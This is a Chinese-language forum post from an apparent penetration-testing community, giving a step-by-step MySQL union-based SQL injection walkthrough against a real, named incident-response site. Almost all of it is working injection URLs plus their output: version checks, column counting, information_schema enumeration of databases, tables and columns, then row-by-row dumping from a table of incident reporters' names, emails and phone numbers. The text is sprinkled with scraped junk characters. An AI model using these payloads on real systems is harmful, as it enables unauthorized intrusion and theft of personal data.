中国网络渗透测试联盟

标题: .高级暴库方法讲解 [打印本页]
作者: admin    时间: 2012-9-13 17:57
标题: .高级暴库方法讲解
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
* ~1 v! D/ f+ V  N7 y2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
2 ~. V3 }) M, bhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
9 u2 j( m, y) q$ r# ]3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--6 u6 X3 v+ {5 x- F
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。9 V) ~0 O6 ]  W. E/ Y- b" [! R2 C& f
4.判断有没有写权限
6 S' ?0 s! L" N* U7 D9 a) _http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
8 q9 w0 k; L3 c4 F: y没办法,手动猜表啦
% }# O8 H6 k( M7 h1 U2 O, a5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1' D, K0 \7 D% E, A) E
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下3 c9 ~3 J  r3 z& V
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--' Z; Y, }/ }% J5 h9 Q7 n" K8 ^- o
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
$ V# H( ~9 A+ q! B8 ainformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
% s* H9 c% o  j1 Q; p  S  F4 d6.爆表,爆的是twcert库4 S/ \$ \* K3 m, T* r6 c
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
: K3 r1 y5 q" n+ Y6 q爆出如下表, m. O$ N4 T  p8 ~; \
downloadfile,irsys,newsdata,secrpt,secrpt_big5
& y% C( N4 t. @  t+ _2 P6 A7.爆列名,这次爆的是irsys表# M5 r8 E/ @: N4 @! h
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--/ {, [) B2 D, s3 Y/ S
爆出如下列* w' h& a1 g; T5 K
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
1 Z/ g  i$ X8 e$ `8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
5 j, X, M6 |$ T" M# |6 g4 Bhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
) _. {4 `; J% b3 F返回是3,说明每个列里有3个地段
: e: K3 O2 b$ {9 n. A) m' Q6 d1 x9.爆字段内容
* c( I3 @7 Q& n: y6 i& ihttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--$ {, o8 ~3 x; `! G4 E/ F6 E& J
爆出name列的第一个字段的内容8 R7 |, F8 n4 N0 i$ @4 N- y% C
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
4 P% r0 v( X" p6 i) ]爆出name列的第二个字段的内容



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2